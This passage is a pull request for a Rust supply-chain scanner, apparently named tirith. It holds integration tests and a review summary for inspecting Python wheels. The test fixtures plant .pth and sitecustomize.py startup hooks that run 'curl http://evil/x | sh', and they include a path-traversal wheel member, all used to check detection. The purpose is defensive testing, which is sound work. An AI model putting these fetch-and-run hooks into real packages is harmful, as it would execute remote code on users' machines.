+    );
+}
+
+#[test]
+fn package_inspect_cross_distribution_attaches_to_loader_names_payload() {
+    let tmp = tempfile::tempdir().unwrap();
+    let proj = tmp.path();
+    // Wheel A (LOADER): a `.pth` that searches sys.path and executes.
+    let a_members: Vec<(&str, &[u8])> = vec![
+        (
+            "loader.pth",
+            b"import sys, os; sys.path.insert(0, '/tmp'); os.system('node payload')\n".as_slice(),
+        ),
+        (
+            "loaderpkg-1.0.dist-info/METADATA",
+            b"Metadata-Version: 2.1\nName: loaderpkg\nVersion: 1.0\n\n".as_slice(),
+        ),
+        (
+            "loaderpkg-1.0.dist-info/RECORD",
+            b"loaderpkg-1.0.dist-info/RECORD,,\n".as_slice(),
+        ),
+    ];
+    let a = write_wheel(proj, "loaderpkg-1.0-py3-none-any.whl", &a_members);
+    // Wheel B (PAYLOAD): a bundled script (a different distribution).
+    let b_members: Vec<(&str, &[u8])> = vec![
+        (
+            "payloadpkg/run.sh",
+            b"#!/bin/sh\ncurl http://evil/x | sh\n".as_slice(),
+        ),
+        (
+            "payloadpkg-2.0.dist-info/METADATA",
+            b"Metadata-Version: 2.1\nName: payloadpkg\nVersion: 2.0\n\n".as_slice(),
+        ),
+        (
+            "payloadpkg-2.0.dist-info/RECORD",
+            b"payloadpkg-2.0.dist-info/RECORD,,\n".as_slice(),
+        ),
+    ];
+    let b = write_wheel(proj, "payloadpkg-2.0-py3-none-any.whl", &b_members);
+
+    let out = tirith_in_proj(proj)
+        .args(["package", "inspect", "--format", "json", "--artifact"])
+        .arg(&a)
+        .arg("--artifact")
+        .arg(&b)
+        .output()
+        .expect("run package inspect set");
+    assert_eq!(
+        out.status.code(),
+        Some(1),
+        "a cross-distribution split is block-grade (exit 1); stderr:\n{}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("inspect set --format json must be valid JSON");
+    let cross = json["cross_distribution_findings"]
+        .as_array()
+        .expect("cross_distribution_findings array");
+    assert_eq!(
+        cross.len(),
+        1,
+        "exactly one cross-distribution finding expected; got: {json}"
+    );
+    // The finding names BOTH the loader and the payload artifact.
+    let cross_text = cross[0].to_string();
+    assert!(
+        cross_text.contains("loaderpkg-1.0-py3-none-any.whl"),
+        "the cross finding must name the loader artifact: {cross_text}"
+    );
+    assert!(
+        cross_text.contains("payloadpkg-2.0-py3-none-any.whl"),
+        "the cross finding must name the payload artifact: {cross_text}"
+    );
+}
+
+#[test]
+fn package_inspect_sdist_is_unsupported_gap_exit_0() {
+    let tmp = tempfile::tempdir().unwrap();
+    let proj = tmp.path();
+    // A gzip-magic file named `.whl` would still sniff as gzip → Unsupported; here
+    // we use a real `.tar.gz` name with gzip magic.
+    let sdist = proj.join("demo-1.0.tar.gz");
+    fs::write(&sdist, [0x1f, 0x8b, 0x08, 0x00, 0, 0, 0, 0]).unwrap();
+    let out = tirith_in_proj(proj)
+        .args(["package", "inspect", "--format", "json", "--artifact"])
+        .arg(&sdist)
+        .output()
+        .expect("run package inspect sdist");
+    // An sdist is Unsupported (a coverage gap), not a finding: clean exit 0.
+    assert_eq!(
+        out.status.code(),
+        Some(0),
+        "an unsupported sdist is a coverage gap, not a block; stderr:\n{}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+    let json: serde_json::Value = serde_json::from_slice(&out.stdout).expect("valid JSON");
+    assert!(
+        json["coverage_gaps"]
+            .as_array()
+            .is_some_and(|g| !g.is_empty()),
+        "the sdist must be recorded as a coverage gap: {json}"
+    );
+}
+
+#[test]
+fn package_inspect_installed_surfaces_integrity() {
+    // B8e: `package inspect --installed` routes through the installed-integrity
+    // engine. Plant an UNOWNED `sitecustomize.py` (a startup hook owned by no
+    // distribution) at a site-packages root and confirm the integrity violation
+    // surfaces in JSON and drives a non-zero exit.
+    let tmp = tempfile::tempdir().unwrap();
+    let venv = tmp.path().join("venv");
+    let site = venv.join("lib").join("python3.11").join("site-packages");
+    fs::create_dir_all(&site).unwrap();
+    // A normal installed distribution (so the tree is realistic).
+    let di = site.join("demo-1.0.dist-info");
+    fs::create_dir_all(&di).unwrap();
+    fs::write(
+        di.join("METADATA"),
+        "Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n",
+    )
+    .unwrap();
+    fs::write(di.join("RECORD"), "demo-1.0.dist-info/RECORD,,\n").unwrap();
+    // The unowned startup hook (not listed in any RECORD).
+    fs::write(
+        site.join("sitecustomize.py"),
+        "import os\nos.system('curl http://evil/x | sh')\n",
+    )
+    .unwrap();
+
+    let out = tirith_in_proj(tmp.path())
+        .args(["package", "inspect", "--format", "json", "--installed"])
+        .arg(&venv)
+        .output()
+        .expect("run package inspect --installed");
+    // An unowned sitecustomize that spawns a subprocess is a block-grade finding.
+    assert_eq!(
+        out.status.code(),
+        Some(1),
+        "an unowned sitecustomize startup hook must drive a non-zero exit; stderr:\n{}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("inspect --installed JSON must be valid");
+    let text = json.to_string();
+    assert!(
+        text.contains("python_startup_hook_suspicious")
+            || text.contains("python_installed_integrity_violation"),
+        "the installed integrity / startup finding must surface: {text}"
+    );
+    // The integrity report itself is present in the JSON (B8e).
+    assert!(
+        json["integrity"].is_object(),
+        "the installed integrity report must be surfaced in JSON: {json}"
+    );
+}
+
+#[test]
+fn package_risk_stays_advisory_exit_0_after_b8() {
+    // B8d/B8b: `package risk` is an ADVISORY scorer and MUST keep exit 0 (B8 added
+    // the verdict-oriented `package inspect`, NOT a behavior change to `risk`). It
+    // does not consume artifact data, so RECORD corruption / startup hooks never
+    // become reputation points or a non-zero exit on this path.
+    let tmp = tempfile::tempdir().unwrap();
+    let out = tirith_in_proj(tmp.path())
+        .args(["package", "risk", "pypi", "requests"])
+        .output()
+        .expect("run package risk");
+    assert_eq!(
+        out.status.code(),
+        Some(0),
+        "package risk must remain advisory (exit 0); stderr:\n{}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+}
+
+#[test]
+fn package_inspect_no_mode_is_usage_error() {
+    let tmp = tempfile::tempdir().unwrap();
+    let out = tirith_in_proj(tmp.path())
+        .args(["package", "inspect"])
+        .output()
+        .expect("run package inspect with no args");
+    assert_eq!(
+        out.status.code(),
+        Some(2),
+        "no inspection target is a usage error (exit 2)"
+    );
+}
+
+#[test]
+fn scan_directory_with_wheel_inspects_member() {
+    let tmp = tempfile::tempdir().unwrap();
+    let proj = tmp.path();
+    // A README + a wheel with an executable `.pth`.
+    fs::write(proj.join("README.md"), "hello").unwrap();
+    let members: Vec<(&str, &[u8])> = vec![
+        (
+            "evil.pth",
+            b"import os; os.system('curl http://evil/x | sh')\n".as_slice(),
+        ),
+        (
+            "demo-1.0.dist-info/METADATA",
+            b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n".as_slice(),
+        ),
+        (
+            "demo-1.0.dist-info/RECORD",
+            b"demo-1.0.dist-info/RECORD,,\n".as_slice(),
+        ),
+    ];
+    write_wheel(proj, "demo-1.0-py3-none-any.whl", &members);
+
+    let out = tirith_in_proj(proj)
+        .args(["scan", "--format", "json", "."])
+        .output()
+        .expect("run scan over a dir with a wheel");
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("scan --format json must be valid JSON");
+    let text = json.to_string();
+    // The wheel was inspected (the regression for the A2 collection-skip): the
+    // startup finding is present, and the location is member-qualified.
+    assert!(
+        text.contains("python_startup_hook_suspicious"),
+        "a directory scan must inspect the bundled wheel and fire the startup finding: {text}"
+    );
+    assert!(
+        text.contains("!/evil.pth"),
+        "the finding must be located at the member-qualified path foo.whl!/evil.pth: {text}"
+    );
+
+    // B8f: the SARIF output also carries the member-qualified artifactLocation, so a
+    // SARIF consumer sees the offending member, not just the outer wheel.
+    let sarif_out = tirith_in_proj(proj)
+        .args(["scan", "--format", "sarif", "."])
+        .output()
+        .expect("run scan --format sarif over a dir with a wheel");
+    let sarif: serde_json::Value =
+        serde_json::from_slice(&sarif_out.stdout).expect("scan --format sarif must be valid JSON");
+    let sarif_text = sarif.to_string();
+    assert!(
+        sarif_text.contains("python_startup_hook_suspicious"),
+        "the SARIF must carry the startup finding: {sarif_text}"
+    );
+    assert!(
+        sarif_text.contains("!/evil.pth"),
+        "the SARIF artifactLocation must be member-qualified (foo.whl!/evil.pth): {sarif_text}"
     );
 }

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -15951,6 +15951,17 @@ fn package_inspect_rejected_wheel_does_not_pass_as_allow() {
         json["artifacts"][0]["rejected"], true,
         "the artifact must be marked rejected: {json}"
     );
+    // The rejection is ALSO a top-level finding, so a CI consumer gating on `findings`
+    // length (not only `action`/exit/the nested `rejected` field) still blocks it.
+    let findings = json["findings"].as_array().expect("findings array");
+    assert!(
+        !findings.is_empty(),
+        "a rejected wheel must surface at least one finding; got: {json}"
+    );
+    assert!(
+        json.to_string().contains("wheel_structurally_rejected"),
+        "the synthetic WheelStructurallyRejected finding must appear in findings; got: {json}"
+    );
 }
 
 #[test]

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -15913,6 +15913,47 @@ fn package_inspect_malicious_wheel_exits_1_with_member_location() {
 }
 
 #[test]
+fn package_inspect_rejected_wheel_does_not_pass_as_allow() {
+    // A structurally REJECTED wheel (sole payload: a path-traversal member, with NO
+    // B5/B6/B7 signal) must NOT exit 0 / report action "allow". A CI consumer keying off
+    // the exit code or the JSON `action` would otherwise pass a path-traversal attack that
+    // the human path already flags [REJECTED] (Greptile).
+    let tmp = tempfile::tempdir().unwrap();
+    let proj = tmp.path();
+    let bytes = build_wheel_bytes(&[
+        ("../../evil.py", b"import os\n".as_slice()),
+        (
+            "demo-1.0.dist-info/METADATA",
+            b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n".as_slice(),
+        ),
+    ]);
+    let wheel = proj.join("demo-1.0-py3-none-any.whl");
+    std::fs::write(&wheel, &bytes).unwrap();
+
+    let out = tirith_in_proj(proj)
+        .args(["package", "inspect", "--format", "json", "--artifact"])
+        .arg(&wheel)
+        .output()
+        .expect("run package inspect");
+    assert_ne!(
+        out.status.code(),
+        Some(0),
+        "a structurally rejected wheel must NOT exit 0; stderr:\n{}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("inspect --format json must be valid JSON");
+    assert_ne!(
+        json["action"], "allow",
+        "a rejected wheel must not report action allow; got: {json}"
+    );
+    assert_eq!(
+        json["artifacts"][0]["rejected"], true,
+        "the artifact must be marked rejected: {json}"
+    );
+}
+
+#[test]
 fn package_inspect_cross_distribution_attaches_to_loader_names_payload() {
     let tmp = tempfile::tempdir().unwrap();
     let proj = tmp.path();

--- a/crates/tirith/tests/help_snapshots.rs
+++ b/crates/tirith/tests/help_snapshots.rs
@@ -95,6 +95,7 @@ help_example_tests! {
     help_package          => (["package", "--help"], "tirith package risk npm react");
     help_package_risk     => (["package", "risk", "--help"], "tirith package risk pypi reqeusts");
     help_package_explain  => (["package", "explain", "--help"], "tirith package explain npm express");
+    help_package_inspect  => (["package", "inspect", "--help"], "tirith package inspect --artifact-set ./downloaded-wheels/");
     help_ecosystem        => (["ecosystem", "--help"], "tirith ecosystem scan");
     help_ecosystem_scan   => (["ecosystem", "scan", "--help"], "tirith ecosystem scan --online ./my-project");
     help_daemon     => (["daemon", "--help"], "tirith daemon start");


### PR DESCRIPTION
Part of the artifact-firewall hardening train (Stack B, PR 4 of 4, the final integration). Bases on B7 (#157). This completes the detection engine: the analyzers (A4 reader, B5 RECORD, B6 startup, B7 native) are now reachable through the CLI.

## What

- New `artifact/inspect.rs` (magic sniff, A4 `read_wheel`, the B5/B6/B7 analyzers, plus the two-pass `ArtifactSetInspection`) and `artifact/correlate.rs` (signal-to-finding correlation, wheel and cross-artifact).
- `tirith scan` magic-dispatches a `.whl` into the inspector instead of recording an Unsupported gap, with member-qualified JSON/SARIF (`foo.whl!/member`). A wheel uses an artifact size ceiling, not the 10 MiB text cap (this regression-fixes the A2 collection-skip).
- New verdict-oriented `tirith package inspect` with `--artifact <file>` (repeatable), `--artifact-set <dir>`, and `--installed <dir>`; scan-style exit codes (0 clean, 1 block-grade, 2 advisory). `tirith package risk` is unchanged (advisory). No `--resolve` flag.
- Artifact-set cross-distribution detection: a two-pass inspection builds the virtual installation ownership map across the wheels, resolves references and execution edges across artifacts, and attaches each cross-distribution finding to the LOADER artifact while NAMING the payload artifact. This is what catches the campaign's cross-`sys.path` loader/payload split across two unopened wheels (acceptance criterion 5), reusing the existing cross-runtime / native-chain / integrity RuleIds.
- `ecosystem scan --installed` surfaces B5's integrity report in human output and folds it into the verdict/exit.

## ArtifactKnownMalicious (cross-track, feature-gated off)

`ArtifactKnownMalicious` (Critical) is registered and reserved behind an off-by-default `artifact-hash-lookup` cargo feature. The threat-DB hash lookups it needs (`check_artifact_sha256`/`check_file_sha256`) are the DB-B deliverable and do not exist yet, so the cfg seam returns None with a `TODO(DB-B)` marker and does NOT reference them; the crate compiles and tests with the feature both off and on. The RuleId is unreachable until DB-D activates the lookups, so it is externally-triggered (no fixture).

## Gate

fmt clean, clippy `--all-targets -D warnings` clean, builds with the feature OFF (default) and ON. tirith-core 3133 lib + 41 golden_fixtures pass; cli_integration 416 pass (including the new package-inspect and A-loads-B cross-distribution tests, plus a benign two-wheel negative control); help_snapshots 204 pass (the new command is snapshotted). The only failing tests are the documented env-race and dev-box flakes (checkpoint, clipboard, url_validate, and on a machine with an active tirith hook the tier1-fast and bash-PTY tests), all green on CI.

## Stack

Completes Stack B and the artifact-firewall detection engine. The remaining DB-B to DB-D format track is independent; once DB-D lands, flipping the `artifact-hash-lookup` feature activates exact known-malicious-hash blocking through the seam this PR reserves.

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR (Stack B, PR 4 of 4) completes the artifact-firewall detection engine by wiring the A4/B5/B6/B7 analyzers into `tirith scan` and introducing the new `tirith package inspect` command with cross-distribution loader/payload correlation.

- **`artifact/inspect.rs` + `artifact/correlate.rs`**: New inspection pipeline — single-artifact (TOCTOU-safe one-fd model, magic sniff, A4 reader, B5/B6/B7 analyzers) and two-pass artifact-set inspection for cross-distribution correlation.
- **`scan.rs`**: Wheels are now magic-dispatched into the artifact scanner instead of recording a blanket `Unsupported` gap; structurally-rejected wheels surface a coverage gap plus any partial findings; the ThreatDb is loaded once and correctly threaded.
- **`package.rs`**: New `tirith package inspect` command with `--artifact`, `--artifact-set`, and `--installed` modes; structurally-rejected wheels synthesize a `WheelStructurallyRejected` finding so `findings[]` is never empty when `action` is `"block"`.


<h3>Confidence Score: 5/5</h3>

The core detection paths are well-guarded: single-fd TOCTOU fix is correct, symlink rejection is in place at both the --artifact and --artifact-set layers, structurally-rejected wheel findings are synthesized correctly, and the JSON write-failure exit-code regression is fixed. The new issues are all documentation/semantic in nature and do not affect runtime security coverage.

All findings flagged are style or low-impact semantic issues: a stale doc comment about an ownership-map build that was removed, policy discovery using only the first artifact's directory when multiple artifacts come from different directories, and a HashBudgetExceeded gap kind that can carry a non-None sha256 for artifacts between the 512 MiB artifact ceiling and the 1 GiB scan budget. None of these affect correctness of the detection or block-grade verdict paths.

The TooLarge → HashBudgetExceeded gap-kind mapping in inspect.rs and the policy-root selection in package.rs are the two spots worth a second look before the next milestone that builds on this output format.

<h3>Important Files Changed</h3>




| Filename | Overview |
|----------|----------|
| crates/tirith-core/src/artifact/inspect.rs | New file: single-artifact inspection (TOCTOU-safe one-fd model, magic sniff, A4/B5/B6/B7) and cross-distribution two-pass set inspection; stale doc on ownership-map build and TooLarge→HashBudgetExceeded gap-kind mismatch |
| crates/tirith-core/src/artifact/correlate.rs | New file: correlates artifact inspection signals into startup/integrity/native/known-malicious findings; feature-gated hash-lookup seam is a correct no-op stub |
| crates/tirith/src/cli/package.rs | New tirith package inspect command; structurally-rejected-wheel handling and JSON write-failure exit code are correct; policy discovery only uses the first artifact's directory for multi-path invocations |
| crates/tirith-core/src/scan.rs | B8a integration: artifact candidates are now magic-dispatched through the real wheel inspector; structurally-rejected wheels return a coverage gap; ThreatDb correctly loaded once and threaded |
| crates/tirith-core/Cargo.toml | Adds artifact-hash-lookup cargo feature gate (off by default) and zip dependency; feature is clearly documented as a no-op seam |
| crates/tirith/src/cli/ecosystem.rs | Minor addition: surfaces B5 integrity report in human output and folds it into the verdict/exit |

</details>



<h3>Sequence Diagram</h3>

<a href="#gh-light-mode-only">

```mermaid
%%{init: {'theme': 'neutral'}}%%
sequenceDiagram
    participant CLI as CLI (main.rs)
    participant PKG as package.rs
    participant SCN as scan.rs
    participant INS as inspect.rs
    participant COR as correlate.rs
    participant ARC as archive.rs (A4)
    participant PTH as pth.rs (B6)
    participant REC as record.rs (B5)
    participant NAT as native.rs (B7)

    Note over CLI,NAT: tirith package inspect --artifact wheel
    CLI->>PKG: inspect(artifacts, ...)
    PKG->>PKG: validate paths (symlink/regular-file check)
    PKG->>INS: inspect_artifact_set(paths)
    INS->>INS: Pass 1 — for each path: inspect_artifact_file
    INS->>ARC: read_wheel (CapturingVisitor)
    ARC-->>INS: ArchiveOutcome (members + native handoffs)
    INS->>PTH: analyze_body (B6, per startup member)
    INS->>REC: verify_wheel_record (B5)
    INS->>NAT: triage_native (B7, per native member)
    INS-->>INS: InspectedArtifact (signals, edges, findings)
    INS->>INS: Pass 2 — correlate_cross_distribution(members)
    INS-->>PKG: ArtifactSetInspection
    PKG->>COR: all_findings — correlate_inspection_findings (per member)
    COR-->>PKG: findings (startup + integrity + native + hash)
    PKG->>PKG: finalize_static_verdict (apply policy)
    PKG->>PKG: check rejected members — synthesize WheelStructurallyRejected
    PKG-->>CLI: exit code (0/1/2)

    Note over CLI,NAT: tirith scan (B8a artifact dispatch)
    CLI->>SCN: scan(config)
    SCN->>SCN: ThreatDb::cached() once
    SCN->>INS: inspect_artifact_candidate (per .whl)
    INS->>ARC: inspect_artifact_file (one fd, try_clone hash)
    ARC-->>INS: InspectedArtifact
    INS->>COR: evaluate_inspected_artifact (policy + threat_db)
    COR-->>INS: Verdict (member-qualified findings)
    INS-->>SCN: FileScanResults + optional CoverageGap
    SCN-->>CLI: ScanResult
```

</a>
<a href="#gh-dark-mode-only">

```mermaid
%%{init: {'theme': 'base', 'themeVariables': {"darkMode": true, "background": "#0d1117", "primaryColor": "#21262d", "primaryTextColor": "#e6edf3", "primaryBorderColor": "#8b949e", "lineColor": "#8b949e", "textColor": "#e6edf3", "edgeLabelBackground": "#161b22", "actorBkg": "#21262d", "actorBorder": "#8b949e", "actorTextColor": "#e6edf3", "actorLineColor": "#8b949e", "signalColor": "#8b949e", "signalTextColor": "#e6edf3", "noteBkgColor": "#373320", "noteBorderColor": "#d4a72c", "noteTextColor": "#f0e6c0", "labelBoxBkgColor": "#21262d", "labelBoxBorderColor": "#8b949e", "labelTextColor": "#e6edf3", "loopTextColor": "#e6edf3", "activationBkgColor": "#30363d", "activationBorderColor": "#8b949e"}}}%%
sequenceDiagram
    participant CLI as CLI (main.rs)
    participant PKG as package.rs
    participant SCN as scan.rs
    participant INS as inspect.rs
    participant COR as correlate.rs
    participant ARC as archive.rs (A4)
    participant PTH as pth.rs (B6)
    participant REC as record.rs (B5)
    participant NAT as native.rs (B7)

    Note over CLI,NAT: tirith package inspect --artifact wheel
    CLI->>PKG: inspect(artifacts, ...)
    PKG->>PKG: validate paths (symlink/regular-file check)
    PKG->>INS: inspect_artifact_set(paths)
    INS->>INS: Pass 1 — for each path: inspect_artifact_file
    INS->>ARC: read_wheel (CapturingVisitor)
    ARC-->>INS: ArchiveOutcome (members + native handoffs)
    INS->>PTH: analyze_body (B6, per startup member)
    INS->>REC: verify_wheel_record (B5)
    INS->>NAT: triage_native (B7, per native member)
    INS-->>INS: InspectedArtifact (signals, edges, findings)
    INS->>INS: Pass 2 — correlate_cross_distribution(members)
    INS-->>PKG: ArtifactSetInspection
    PKG->>COR: all_findings — correlate_inspection_findings (per member)
    COR-->>PKG: findings (startup + integrity + native + hash)
    PKG->>PKG: finalize_static_verdict (apply policy)
    PKG->>PKG: check rejected members — synthesize WheelStructurallyRejected
    PKG-->>CLI: exit code (0/1/2)

    Note over CLI,NAT: tirith scan (B8a artifact dispatch)
    CLI->>SCN: scan(config)
    SCN->>SCN: ThreatDb::cached() once
    SCN->>INS: inspect_artifact_candidate (per .whl)
    INS->>ARC: inspect_artifact_file (one fd, try_clone hash)
    ARC-->>INS: InspectedArtifact
    INS->>COR: evaluate_inspected_artifact (policy + threat_db)
    COR-->>INS: Verdict (member-qualified findings)
    INS-->>SCN: FileScanResults + optional CoverageGap
    SCN-->>CLI: ScanResult
```

</a>

<!-- greptile_failed_comments -->
<details><summary><h3>Comments Outside Diff (2)</h3></summary>

1. `crates/tirith-core/src/scan.rs`, line 378-415 ([link](https://github.com/sheeki03/tirith/blob/9ef1abcebe5adeef71889b2b367e8e1bf8ce9188/crates/tirith-core/src/scan.rs#L378-L415)) 

   <a href="#"><img alt="P2" src="https://greptile-static-assets.s3.amazonaws.com/badges/p2.svg?v=9" align="top"></a> **Whitespace-split path extraction breaks for member paths that contain spaces**

   `artifact_finding_location` recovers a member-qualified path by splitting the evidence `detail` string on whitespace and then matching tokens that contain `!/`. Because `detail` is free-form human-readable text, any member path containing a space (legal in wheel members, rare but valid) will be split mid-token, causing `cleaned.find("!/")` to fail and the finding to fall back to the outer wheel path. The SARIF/JSON `path` field would then point at the container instead of the offending member, defeating the B8f member-qualified-location goal for those entries.

   <a href="https://app.greptile.com/ide/claude-code?prompt=This%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20crates%2Ftirith-core%2Fsrc%2Fscan.rs%0ALine%3A%20378-415%0A%0AComment%3A%0A**Whitespace-split%20path%20extraction%20breaks%20for%20member%20paths%20that%20contain%20spaces**%0A%0A%60artifact_finding_location%60%20recovers%20a%20member-qualified%20path%20by%20splitting%20the%20evidence%20%60detail%60%20string%20on%20whitespace%20and%20then%20matching%20tokens%20that%20contain%20%60!%2F%60.%20Because%20%60detail%60%20is%20free-form%20human-readable%20text%2C%20any%20member%20path%20containing%20a%20space%20%28legal%20in%20wheel%20members%2C%20rare%20but%20valid%29%20will%20be%20split%20mid-token%2C%20causing%20%60cleaned.find%28%22!%2F%22%29%60%20to%20fail%20and%20the%20finding%20to%20fall%20back%20to%20the%20outer%20wheel%20path.%20The%20SARIF%2FJSON%20%60path%60%20field%20would%20then%20point%20at%20the%20container%20instead%20of%20the%20offending%20member%2C%20defeating%20the%20B8f%20member-qualified-location%20goal%20for%20those%20entries.%0A%0AHow%20can%20I%20resolve%20this%3F%20If%20you%20propose%20a%20fix%2C%20please%20make%20it%20concise.&repo=sheeki03%2Ftirith&pr=159&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaudeDark.svg?v=3"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3"><img alt="Fix in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3" height="20"></picture></a>

2. `crates/tirith/src/cli/package.rs`, line 2349-2357 ([link](https://github.com/sheeki03/tirith/blob/e5fb7bbb6c707ca0211f0bae849faf11ea6c0311/crates/tirith/src/cli/package.rs#L2349-L2357)) 

   <a href="#"><img alt="P1" src="https://greptile-static-assets.s3.amazonaws.com/badges/p1.svg?v=9" align="top"></a> **Symlink path passes existence check but produces exit 0 without inspection**

   `p.exists()` follows the symlink (returning `true` when the target exists), but `inspect_artifact_file` calls `open_read_no_follow_capped` which rejects the symlink's final component with `NotRegularFile → Unreadable`. The error is routed into `set.gaps` rather than `set.members`, so `set.members` is empty, `all_findings` produces nothing, and `verdict.action` stays `Allow` — exit 0. A CI consumer keying on exit code interprets this as "inspected and clean" when no inspection occurred.

   The guard comment says "a typo is a usage error (exit 2), not a silent coverage gap." That intent is not honoured for symlinks. Use `p.is_file() && !p.is_symlink()` as the gate, or promote any gap whose path was explicitly supplied by the caller to exit 2.

   <a href="https://app.greptile.com/ide/claude-code?prompt=This%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20crates%2Ftirith%2Fsrc%2Fcli%2Fpackage.rs%0ALine%3A%202349-2357%0A%0AComment%3A%0A**Symlink%20path%20passes%20existence%20check%20but%20produces%20exit%200%20without%20inspection**%0A%0A%60p.exists%28%29%60%20follows%20the%20symlink%20%28returning%20%60true%60%20when%20the%20target%20exists%29%2C%20but%20%60inspect_artifact_file%60%20calls%20%60open_read_no_follow_capped%60%20which%20rejects%20the%20symlink's%20final%20component%20with%20%60NotRegularFile%20%E2%86%92%20Unreadable%60.%20The%20error%20is%20routed%20into%20%60set.gaps%60%20rather%20than%20%60set.members%60%2C%20so%20%60set.members%60%20is%20empty%2C%20%60all_findings%60%20produces%20nothing%2C%20and%20%60verdict.action%60%20stays%20%60Allow%60%20%E2%80%94%20exit%200.%20A%20CI%20consumer%20keying%20on%20exit%20code%20interprets%20this%20as%20%22inspected%20and%20clean%22%20when%20no%20inspection%20occurred.%0A%0AThe%20guard%20comment%20says%20%22a%20typo%20is%20a%20usage%20error%20%28exit%202%29%2C%20not%20a%20silent%20coverage%20gap.%22%20That%20intent%20is%20not%20honoured%20for%20symlinks.%20Use%20%60p.is_file%28%29%20%26%26%20!p.is_symlink%28%29%60%20as%20the%20gate%2C%20or%20promote%20any%20gap%20whose%20path%20was%20explicitly%20supplied%20by%20the%20caller%20to%20exit%202.%0A%0AHow%20can%20I%20resolve%20this%3F%20If%20you%20propose%20a%20fix%2C%20please%20make%20it%20concise.&repo=sheeki03%2Ftirith&pr=159&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaudeDark.svg?v=3"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3"><img alt="Fix in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3" height="20"></picture></a>
</details>

<!-- /greptile_failed_comments -->

<sub>Reviews (29): Last reviewed commit: ["fix(package): reject symlinked wheels in..."](https://github.com/sheeki03/tirith/commit/d1e5406af1026eb2e7e2346c0546573fc5eff363) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=38696174)</sub>

<!-- /greptile_comment -->